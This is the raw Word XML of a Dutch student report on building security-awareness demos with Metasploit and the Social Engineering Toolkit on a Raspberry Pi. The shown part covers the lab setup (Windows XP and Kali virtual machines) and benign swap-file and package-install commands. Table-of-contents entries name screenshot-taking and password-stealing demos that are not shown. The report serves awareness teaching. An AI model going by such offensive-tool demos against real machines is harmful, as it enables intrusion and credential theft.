                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110978" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Neem screenshots</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110978 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110979" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Steel passwoorden</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110979 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00654966" w:rsidRDefault="00654966">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="nl-NL"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00D914C0" w:rsidRDefault="00D914C0"/>
    <w:p w:rsidR="00D914C0" w:rsidRDefault="00D914C0"/>
    <w:p w:rsidR="00D914C0" w:rsidRDefault="00D914C0"/>
    <w:p w:rsidR="00D914C0" w:rsidRDefault="00D914C0"/>
    <w:p w:rsidR="00EE2CD3" w:rsidRDefault="00EE2CD3" w:rsidP="00B67528">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc440110963"/>
    </w:p>
    <w:p w:rsidR="00EE2CD3" w:rsidRDefault="00EE2CD3" w:rsidP="00B67528">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="00D914C0" w:rsidRDefault="00D914C0" w:rsidP="00B67528">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE2CD3" w:rsidRDefault="00EE2CD3" w:rsidP="00EE2CD3"/>
    <w:p w:rsidR="00EE2CD3" w:rsidRDefault="00EE2CD3" w:rsidP="00EE2CD3"/>
    <w:p w:rsidR="00EE2CD3" w:rsidRPr="00EE2CD3" w:rsidRDefault="00EE2CD3" w:rsidP="00EE2CD3"/>
    <w:p w:rsidR="00B67528" w:rsidRDefault="00EE2CD3" w:rsidP="00EE2CD3">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Projectbeschrijving</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2CD3" w:rsidRPr="00EE2CD3" w:rsidRDefault="00EE2CD3" w:rsidP="00EE2CD3"/>
    <w:p w:rsidR="00B67528" w:rsidRPr="00B67528" w:rsidRDefault="00B67528" w:rsidP="00B67528">
      <w:r>
        <w:t xml:space="preserve">Wij hebben gekozen voor het project sensibilisering met </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Social</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> engineeri</w:t>
      </w:r>
      <w:r w:rsidR="00047FB4">
        <w:t xml:space="preserve">ng </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00047FB4">
        <w:t>toolkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00047FB4">
        <w:t>. De opdracht was om enkele</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> demonstraties te maken </w:t>
      </w:r>
      <w:r w:rsidR="00622097">
        <w:t>die kunnen gebruikt worden om tijdens de sensibiliseringscampagnes bij studenten (of middelbare scholen) de gevaren van het intern</w:t>
      </w:r>
      <w:r w:rsidR="00A954DE">
        <w:t>et aan te tonen. De demo’s moet</w:t>
      </w:r>
      <w:r w:rsidR="00622097">
        <w:t xml:space="preserve">en allemaal uitgevoerd worden via de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00622097">
        <w:t>Raspberry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00622097">
        <w:t xml:space="preserve"> Pi zodat een laptop met kali OS geen vereiste is en men gewoon via remote shell op de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00622097">
        <w:t>rpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00622097">
        <w:t xml:space="preserve"> kan inloggen om de nodige zaken te demonstreren.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00772B3F" w:rsidRDefault="00772B3F" w:rsidP="00622097">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00622097" w:rsidRDefault="00622097" w:rsidP="00622097">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc440110964"/>
      <w:r>
        <w:t>Voorbereiding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00F80FAE" w:rsidRDefault="00F80FAE" w:rsidP="00F80FAE">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F80FAE" w:rsidRPr="00F80FAE" w:rsidRDefault="00F80FAE" w:rsidP="00F80FAE">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc440110965"/>
      <w:r>
        <w:t>Testomgeving met virtuele machines</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00772B3F" w:rsidRDefault="00772B3F" w:rsidP="00622097"/>
    <w:p w:rsidR="00772B3F" w:rsidRDefault="00622097" w:rsidP="00622097">
      <w:r>
        <w:t xml:space="preserve">Voor we aan de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> konden beginnen moesten we onze testomgeving opstellen, </w:t>
      </w:r>
      <w:r w:rsidR="00AF674D">
        <w:t>we</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> moesten zowel de aanvalle</w:t>
      </w:r>
      <w:r w:rsidR="00A954DE">
        <w:t xml:space="preserve">r als het slachtoffer simuleren, </w:t>
      </w:r>
      <w:r>
        <w:t>hiervoor hebben wij 2 virtuele mac</w:t>
      </w:r>
      <w:r w:rsidR="00AF674D">
        <w:t>hines aangemaakt met op de 1ne W</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> m</w:t>
      </w:r>
      <w:r w:rsidR="00AF674D">
        <w:t>et sp2 (later W</w:t>
      </w:r>
      <w:r>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidR="00AF674D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AF674D">
        <w:t>xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF674D">
        <w:t xml:space="preserve"> zonder </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AF674D">
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AF674D">
        <w:t>) en op de andere Kali L</w:t>
      </w:r>
      <w:r>
        <w:t>inux.</w:t>
      </w:r>
      <w:r w:rsidR="00772B3F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A954DE">
        <w:t xml:space="preserve">De installatie ging niet zonder problemen , voor de installatie voltooid was kregen we altijd een error. Dit hebben we kunnen oplossen door in de Bios </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A954DE">
        <w:t>settings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A954DE">
        <w:t xml:space="preserve"> van de computer de optie “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A954DE">
        <w:t>virtualization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A954DE">
        <w:t xml:space="preserve">” te </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A954DE">
        <w:t>enablen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A954DE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F80FAE">
        <w:t xml:space="preserve"> Ook werkte er in het begin geen enkele </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F80FAE">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F80FAE">
        <w:t xml:space="preserve"> , dit kwam door de netwerk instellingen van de virtuele machines! Na wat opzoekwerk vonden we de juiste instellingen , we moesten de </w:t>
      </w:r>
      <w:r w:rsidR="00EE2CD3">
        <w:t>netwerk</w:t>
      </w:r>
      <w:r w:rsidR="00F80FAE">
        <w:t>adapter instellen op NAT-netwerk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00772B3F" w:rsidRDefault="00772B3F" w:rsidP="00622097">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F699056" wp14:editId="6FD30FED">
            <wp:extent cx="5760720" cy="3078480"/>
            <wp:effectExtent l="0" t="0" r="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B3F" w:rsidRDefault="00772B3F"/>
    <w:p w:rsidR="00F80FAE" w:rsidRDefault="00F80FAE"/>
    <w:p w:rsidR="00F80FAE" w:rsidRDefault="00F80FAE"/>
    <w:p w:rsidR="00F80FAE" w:rsidRDefault="00F80FAE" w:rsidP="00F80FAE">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc440110966"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Raspberry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Pi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bestuursysteem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> installatie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00F80FAE" w:rsidRPr="00F80FAE" w:rsidRDefault="00F80FAE" w:rsidP="00F80FAE"/>
    <w:p w:rsidR="0057699B" w:rsidRDefault="00AF674D">
      <w:r>
        <w:t xml:space="preserve">We moesten ook de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Raspb</w:t>
      </w:r>
      <w:r w:rsidR="00F80FAE">
        <w:t>erry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F80FAE">
        <w:t xml:space="preserve"> Pi voorzien van een OS en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F80FAE">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>etasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (omdat we hier de uiteindelijke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> op gingen doen).</w:t>
      </w:r>
      <w:r w:rsidR="00772B3F">
        <w:t xml:space="preserve"> Als OS op</w:t>
      </w:r>
      <w:r w:rsidR="00F80FAE">
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F80FAE">
        <w:t>rpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F80FAE">
        <w:t xml:space="preserve"> hebben we gekozen voor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F80FAE">
        <w:t>Raspbian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F80FAE">
        <w:t xml:space="preserve"> omdat dit nog op B</w:t>
      </w:r>
      <w:r w:rsidR="00772B3F">
        <w:t xml:space="preserve">erten zijn </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00772B3F">
        <w:t>rpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00772B3F">
        <w:t xml:space="preserve"> stond. Hierna moesten we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00772B3F">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00772B3F">
        <w:t xml:space="preserve"> installeren , dit verliep echter niet zo soepel als we hadden gedacht ! </w:t>
      </w:r>
      <w:r w:rsidR="00F80FAE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E75755">
        <w:t>Tijdens</w:t>
      </w:r>
      <w:r w:rsidR="008C0D82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E75755">
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidR="00F80FAE">
        <w:t xml:space="preserve">installatie van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F80FAE">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="008C0D82">
        <w:t>etasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C0D82">
        <w:t xml:space="preserve"> kregen we een foutmelding die ons verteld</w:t>
      </w:r>
      <w:r w:rsidR="00603B12">
        <w:t xml:space="preserve">e dat er te weinig geheugen was. </w:t>
      </w:r>
      <w:r w:rsidR="00F80FAE">
        <w:t xml:space="preserve">Daarom </w:t>
      </w:r>
      <w:r w:rsidR="0057699B">
        <w:t xml:space="preserve">hebben we SWAP files ingesteld </w:t>
      </w:r>
      <w:r w:rsidR="00603B12">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0057699B">
        <w:t>dit zorgt ervoor dat het RAM</w:t>
      </w:r>
      <w:r w:rsidR="009F2B82">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0057699B">
        <w:t>geheugen word ui</w:t>
      </w:r>
      <w:r w:rsidR="00F80FAE">
        <w:t xml:space="preserve">tgebreid met een deel van de SD </w:t>
      </w:r>
      <w:r w:rsidR="0057699B">
        <w:t xml:space="preserve">kaart van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0057699B">
        <w:t>rpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0057699B">
        <w:t xml:space="preserve">. We hebben deze code gebruikt om dit waar te maken </w:t>
      </w:r>
      <w:r w:rsidR="00E75755">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0057699B" w:rsidRPr="00047FB4" w:rsidRDefault="0057699B" w:rsidP="0057699B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0057699B" w:rsidRPr="00047FB4" w:rsidRDefault="0057699B" w:rsidP="0057699B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo "CONF_SWAPSIZE=1024" &gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dphys-swapfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0057699B" w:rsidRPr="00047FB4" w:rsidRDefault="0057699B" w:rsidP="0057699B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dphys-swapfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setup  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0057699B" w:rsidRPr="00047FB4" w:rsidRDefault="0057699B" w:rsidP="0057699B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dphys-swapfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>swapon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00047FB4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0057699B" w:rsidRPr="00E75755" w:rsidRDefault="0057699B" w:rsidP="0057699B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75755" w:rsidRDefault="00E75755" w:rsidP="0057699B">
      <w:r>
        <w:t xml:space="preserve">hierna hebben we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> terug proberen installeren met deze code :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75755" w:rsidRPr="00E75755" w:rsidRDefault="00E75755" w:rsidP="00E75755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">-get update   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">-get -y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>build-essential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> zlib1g zlib1g-dev libxml2 libxml2-dev </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>libxslt-dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>locate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> libreadline6-dev libcurl4-openssl-dev git-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>core</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>libssl-dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>libyaml-dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>autoconf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>libtool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E75755">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ncurses-dev</w:t>
      </w:r>
